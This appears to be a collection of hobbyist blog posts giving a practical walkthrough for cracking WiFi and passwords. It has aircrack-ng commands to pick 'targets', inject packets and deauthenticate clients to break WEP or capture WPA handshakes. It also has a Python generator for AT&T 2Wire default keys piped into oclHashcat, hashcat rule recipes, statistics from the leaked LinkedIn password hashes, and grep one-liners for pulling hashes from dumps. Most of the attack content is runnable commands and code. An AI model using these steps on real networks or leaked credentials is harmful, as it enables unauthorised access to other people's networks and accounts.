INIT_6

My previous post had a few problems with the script. Then I had updated the script to work properly. http://pastie.org/5101804  However, it was still way to slow. Asked around and found the following solution.  

http://pastie.org/5104479

#Python 3
#Name: 2wire.py
#by: INIT_6
#Count from 0000000000 - 9999999999 skipping any numbers that repeat them selfs more then 3 times like 333

import sys
from threading import Thread

def count1(first, ver):
    MAX_INT = 999000000
    BAD_PATTERNS = {x * 3 for x in '0123456789'}
    # Use xrange for Python 2.7
    for number in range(MAX_INT):
        int_string = str(number).rjust(9, '0')
        if any(pattern in int_string for pattern in BAD_PATTERNS):
            continue
        print ( str(first) + str(number).rjust(9, '0') )

if __name__ == '__main__':
    for x in '0123456789':
        try:
            Thread(target=count1, args=(x,1)).start()
    
        except: # Exception, errtxt:
           print ( errtxt )

Still have some work. I need to test the threading better and set up a queue so it will only start as many threads as the computer can handle.

There are 100's if not 1000's of guides out there on how to crack WEP. This will mostly be a quick and dirty reference guide for a few friends trying to crack WEP them self's.

Aircrack-ng's guide to cracking WEP

Download and boot off of backtrack 5 r3 To install it on a flash drive use linux/windows tool YUMI

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0 
#airodump-ng --encrypt wep mon0

You should see several AP. Record the BSSID, ESSID, and Channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple targets on the same channel. You need to close airodump and stop airmon

#airmon-zc stop mon0 

Start airmon-zc on the channel of the target. (with WEP its not as necessary to lock the channel in on the driver as you have to with WPA)

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wep --ivs --write <FILENAME> --output-format pcap -a --channel <Channel number>

Now you need to inject packets. This will send packets to the access point as the other associated client generating your golden IVS you need to crack the WEP. 

#aireplay-ng mon0 -1 0 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 

If the above isn't generating any IVs you might need to tweak your command line. 

#aireplay-ng mon0 -1 <a number between 30-6000> -o <a number between 1-30> -q 10 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 




18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.

8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request


You can also do a ARP request replay attack. Either at the same time or in lieu of the above attack. 

#aireplay-ng mon0 -3 -b <MAC address of Access point> -h <MAC address of associated client>



 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...


Now to crack the IV's you have obtain. There are a lot of different options at this point. For example. AT&T U-verse default wep is only numbers. Verizon FIOS wep is 0-9A-F. Doing home work on the default SSID might lead to a quicker crack.

Static WEP cracking options:

-c     Search alpha-numeric characters only.

-t      Search binary coded decimal characters only.

-n <nbits>

Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc., until 512 bits of length. The default value is 128.

-f <fudge>

By default, this parameter is set to 2. Use a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.

-k <korek>

There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.

#aircrack-ng <any static WEP cracking options above> <filename>.cap

It will ask you to select your network you want to crack and show how many IV's it currently has. 

I only use the -f 1 option to get keys that are to easy and are thought to be false positives i.e. 123456789 or 111111111 

and remember a few quick google searches on the SSID (if its a default SSID) can save you a lot of time. 

Side note: if you run:

#iwconfig wlan0

And your power isn't set correctly to your gear you can change this by.

#iwconfig wlan0 twpower <dbi>


This is not a complete guide of everything you can do. Its just what I do and have a high success rate. if you have any questions feel free to drop me a e-mail/Gtalk at init6@init6.me 

Part 2. Cracking AT&T WPA1/2 with python script and hashcat.

Once you get the four way handshake from part 1.

My python script can be found here. It creates a CPU pool based on how many cores you have. Based on python 2.7.3 and Linux OS.

What the script does is count from 000000000 to 9999999999 skipping any number that has three repeating numbers in a row.  so you wont have keys like 1234555678 because it repeats 5 three times. This is because AT&T decided to make their numbers to random cutting their key space down. Its faster to count through and skip past repeating numbers then to process each number.

To change what the programs start on open it and change the following line to whatever you want:

start = str(7)

To run the program pipe it to hashcat-plus.

python 2wireWPAiter.py | ./oclHashcat-plus64.bin -m 2500 -a 0 --gpu-accel=160 --gpu-loops=1024 ../dir/2WIREHandShake.hccap


With a AMD driver 12.8 and SDK 2.7 I get about 86K keys  per second. With the built in brute-force I get 114K keys per second. Still working on how to improve my out put speed. 

To get more info on hashcat look here.

straight brute force on known key starting with 7 saved over an hour.

Screen shots.. With script                without script 


Someone in the hashcat room just told me a better way of doing this to make it even faster and more accurate. using http://hashcat.net/wiki/doku.php?id=statsprocessor making a hcstat file. Utilizing Markov chains. I will do this later tonight and post my results.

Edit: you can't use Markov chains with hashcat for this. 

Part 1. Getting the handshake.

Aircrack's site has a pretty good tutorial.

Boot from Back Track 5 R3

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0 

You should see several AP. Record the BSSID and Channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple targets on the same channel. You need to close airodump and stop airmon

#airmon-zc stop mon0

Start airmon-zc on the channel of the target.

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>

Channel number need to be the same as your target to so you can get the full four way handshake between the client and the AP.  Airodump should show in the top right hand corner once you get a handshake.

Instead of waiting around for a client to connect you can deauthenticate a client and wait for it to auto reconnect.

#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

• -0 means deauthentication
• 5 is the number of deauths to send
• -a 00:14:6C:7E:40:80 is the MAC address of the access point
• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
• mon0 is the interface name

If you are using backtrack you can easily check your .pcap file to see if it has a proper handshake by using pyrit. or you can load up wireshark and run a filter for EAPOL what I will show in a future post.

#pyrit -r FILENAME.pcap analyze 

The output should tell you if you have good EAPOL handshake or workable or nothing at all if none are found.

To strip out all the crap out of your pcap file expect for your handshakes run the following:

#pyrit -r FILENAME.pcap -o OUTPUT.pcap strip

To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/ or use the steps they tell you to convert it your self. I just use their site.

Link to information about Hashcat rule based attack.

Besides the out of box rules and some of the amazing rules atom and his team comes up with. I will be updating this post from time to time adding new rules I come up with or others give me the idea to come up with.

malik51: and i where talking. I was trying to get ?d?s to be preappended and appended to a pass. As running two rules one appending and one preappending is slow and doesn't work.  After much frustration I had one good idea what I will share below. His solution.

./mp64.bin -1 ?d?s '$?1 $?1 Y2 }}' -o malik51roll2.rule
./mp64.bin -1 ?d?s '$?1 $?1 $?1 Y3 }}}' -o malik51roll3.rule

This will add the same to both sides. !@pass!@ or 123pass123. Works great, and its fast.

However, I wanted more.  I wanted passwords like 1@pass$% or 123pass#$%  What I thought was the solution to the above actual works for this. It will first reverse the pass. ssap then append the digit or special character ssap@1 then reverse the word again. 1@pass  Then finally append the next set to get you 1@pass$%

./mp64.bin -1 ?d?s 'r $?1 $?1 r $?1 $?1' -o init6reverse.rule

However, this only works for two spots. you cant do 123pass#$% just to big.

In the spirit of the malik51roll2.rule I made the ldsUroll.rule
./mp64.bin -1 ?l?d?s?u '$?1 $?1 Y2 }}' -o ldsUroll.rule
It appends and presppends lowercase, digits, special, and uppercase.


EDIT: 8/12/2012 4:13AM

The following haven't found that many, but they found some.


bible verse numbers:

./mp64.bin -1 123456 -2 12 '$: $?d $?d' -o biblenum1.rule
./mp64.bin -1 123456 -2 12 '$: $1 $?d $?d' -o biblenum2.rule
./mp64.bin -1 123456 -2 12 '$  $: $?d $?d' -o biblenum1a.rule
./mp64.bin -1 123456 -2 12 '$  $: $1 $?d $?d' -o biblenum2a.rule
./mp64.bin -1 123456 -2 12 '$?d $: $?d $?d' -o biblenum3.rule
./mp64.bin -1 123456 -2 12 '$?d $: $1 $?d $?d' -o biblenum4.rule
./mp64.bin -1 123456 -2 12 '$?1 $?d $: $?d $?d $?d' -o biblenum5.rule
./mp64.bin -1 123456 -2 12 '$?1 $?d $: $1 $?d $?d $?d' -o biblenum6.rule
./mp64.bin -1 123456 -2 12 '$1 $5 $0 $: $?2 $?d $?d $?d' -o biblenum7.rule

biblenum* >> bible.rule



append : 1-3 everything

./mp64.bin -1 ?d?s?l?u '$: $?1' -o append1.rule
./mp64.bin -1 ?d?s?l?u '$: $?1 $?1' -o append2.rule
./mp64.bin -1 ?d?s?l?u '$: $?1 $?1 $?1' -o append3.rule

append* >> append.rule



Append clock both 12 and 24 hour

./mp64.bin -1 12 -2 1234 -3 12345 '$?1 $?2 $: $?3 $?d' -o clock.rule

#haven't tried this, most likly to large.
./mp64.bin -1 12 -2 1234 -3 12345 '$?1 $?2 $: $?3 $?d $: $?d $?d' -o clockSeconds.rule

Number of Linkedin passwords analysed: 4,769,941

Passpal.rb output. See the full report here. 

I also ran some other reports. Just the masked hashes that were zeroed out for the first 5 bytes can be found here.
Just the normal hashes that didn't have the zeroed out bytes report can be found here. 


Base word (len>=3) frequency, sorted by count, top 20
+-----------------------------+
|   Word   | Count | Of total |
+-----------------------------+
| linkedin |  3674 | 0.077 %  |
| link     |  2282 | 0.0478 % |
| linked   |  1905 | 0.0399 % |
| alex     |  1089 | 0.0228 % |
| mike     |  1075 | 0.0225 % |
| may      |  1032 | 0.0216 % |
| love     |   967 | 0.0203 % |
| Linkedin |   865 | 0.0181 % |
| june     |   860 | 0.018 %  |
| john     |   852 | 0.0179 % |
| blue     |   788 | 0.0165 % |
| jan      |   765 | 0.016 %  |
| jack     |   746 | 0.0156 % |
| july     |   709 | 0.0149 % |
| password |   701 | 0.0147 % |
| sam      |   695 | 0.0146 % |
| pass     |   693 | 0.0145 % |
| chris    |   663 | 0.0139 % |
| mark     |   628 | 0.0132 % |
| dec      |   624 | 0.0131 % |
+-----------------------------+

Length frequency, sorted by length, full table
+------------------------------+
| Length |  Count  | Of total  |
+------------------------------+
|      1 |      28 | 0.0006 %  |
|      2 |      25 | 0.0005 %  |
|      3 |      23 | 0.0005 %  |
|      4 |       5 | 0.0001 %  |
|      5 |       2 | 0.0 %     |
|      6 |  578859 | 12.1354 % |
|      7 |  596636 | 12.5081 % |
|      8 | 1567986 | 32.8718 % |
|      9 |  822634 | 17.246 %  |
|     10 |  567261 | 11.8923 % |
|     11 |  290798 | 6.0964 %  |
|     12 |  174207 | 3.6521 %  |
|     13 |   87247 | 1.8291 %  |
|     14 |   49301 | 1.0336 %  |
|     15 |   23493 | 0.4925 %  |
|     16 |    9970 | 0.209 %   |
|     17 |     801 | 0.0168 %  |
|     18 |     383 | 0.008 %   |
|     19 |     161 | 0.0034 %  |
|     20 |      81 | 0.0017 %  |
+------------------------------+


Charset frequency, sorted by count, full table
+-------------------------------------------------------------------------+
|           Charset            |  Count  | Of total  |   Count/keyspace   |
+-------------------------------------------------------------------------+
| lower-upper-numeric-symbolic | 4707243 | 98.6844 % | 49549.926315789475 |
| lower-upper-numeric          | 4320927 | 90.5855 % |  69692.37096774194 |
| lower-numeric-symbolic       | 3605939 | 75.5962 % | 52259.985507246376 |
| lower-numeric                | 3402358 | 71.3283 % |  94509.94444444444 |
| lower-upper-symbolic         | 1275390 | 26.7377 % | 15004.588235294117 |
| lower-upper                  | 1202678 | 25.2134 % | 23128.423076923078 |
| lower-symbolic               | 1104595 | 23.1571 % | 18721.949152542373 |
| lower                        | 1055703 | 22.1321 % |  40603.96153846154 |
| upper-numeric-symbolic       |  299598 | 6.2809 %  |             4342.0 |
| upper-numeric                |  286005 | 5.9959 %  |  7944.583333333333 |
| numeric-symbolic             |  204379 | 4.2847 %  |             4753.0 |
| numeric                      |  200999 | 4.2138 %  |            20099.9 |
| upper-symbolic               |   28394 | 0.5953 %  |  481.2542372881356 |
| upper                        |   26797 | 0.5618 %  | 1030.6538461538462 |
| symbolic                     |     133 | 0.0028 %  |   4.03030303030303 |
+-------------------------------------------------------------------------+

Charset frequency, sorted by count/keyspace, full table
+-------------------------------------------------------------------------+
|           Charset            |  Count  | Of total  |   Count/keyspace   |
+-------------------------------------------------------------------------+
| lower-numeric                | 3402358 | 71.3283 % |  94509.94444444444 |
| lower-upper-numeric          | 4320927 | 90.5855 % |  69692.37096774194 |
| lower-numeric-symbolic       | 3605939 | 75.5962 % | 52259.985507246376 |
| lower-upper-numeric-symbolic | 4707243 | 98.6844 % | 49549.926315789475 |
| lower                        | 1055703 | 22.1321 % |  40603.96153846154 |
| lower-upper                  | 1202678 | 25.2134 % | 23128.423076923078 |
| numeric                      |  200999 | 4.2138 %  |            20099.9 |
| lower-symbolic               | 1104595 | 23.1571 % | 18721.949152542373 |
| lower-upper-symbolic         | 1275390 | 26.7377 % | 15004.588235294117 |
| upper-numeric                |  286005 | 5.9959 %  |  7944.583333333333 |
| numeric-symbolic             |  204379 | 4.2847 %  |             4753.0 |
| upper-numeric-symbolic       |  299598 | 6.2809 %  |             4342.0 |
| upper                        |   26797 | 0.5618 %  | 1030.6538461538462 |
| upper-symbolic               |   28394 | 0.5953 %  |  481.2542372881356 |
| symbolic                     |     133 | 0.0028 %  |   4.03030303030303 |
+-------------------------------------------------------------------------+


Total characters: 40923061
Unique characters: 343
Top 50 characters: ae1inrosl02tmd3cuhk947b85gp6yjfvwzxASML!BR@CTEDNPI

Character frequency, sorted by count, top 20
+--------------------------------+
| Character |  Count  | Of total |
+--------------------------------+
| a         | 3018713 | 7.3766 % |
| e         | 2503293 | 6.1171 % |
| 1         | 2021211 | 4.9391 % |
| i         | 2015863 | 4.926 %  |
| n         | 1894225 | 4.6287 % |
| r         | 1760160 | 4.3011 % |
| o         | 1723761 | 4.2122 % |

Symbol frequency, sorted by count, top 20
+-----------------+
| Symbol | Count  |
+-----------------+
| !      | 111239 |
| @      | 100945 |
| #      |  44236 |
| .      |  43380 |
| *      |  40449 |
| _      |  32678 |
| -      |  29112 |
| &      |  14655 |

To search for SHA1 in file:
cat FILE | grep -o -E -e "[0-9a-f]{40}" | sort | uniq -u > all-SHA1

To search for SHA-256 in file:
cat FILE | grep -o -E -e "[0-9a-f]{64}" | sort | uniq -u > all-SHA256

To search for SHA-512 in file:
cat FILE | grep -o -E -e "[0-9a-f]{128}" | sort | uniq -u > all-SHA512

To search for MD5 in file:
cat FILE | grep -o -E -e "[0-9a-f]{32}" | sort | uniq -u > all-md5

To search for MD5crypt in file:
cat FILE | grep '^\$1\$' | cut -d: -f2- | sort | uniq -u > all-md5crypt

To search for NTLM in file:
cat FILE | grep -o -E -e ':\$NT\$[[:alnum:]]{32}:' | sort | uniq -u > all-NTLM
cat FILE | grep -o -E -e ':\$NT\$[[:alnum:]]{30,34}:' | sort | uniq -u > all-NTLM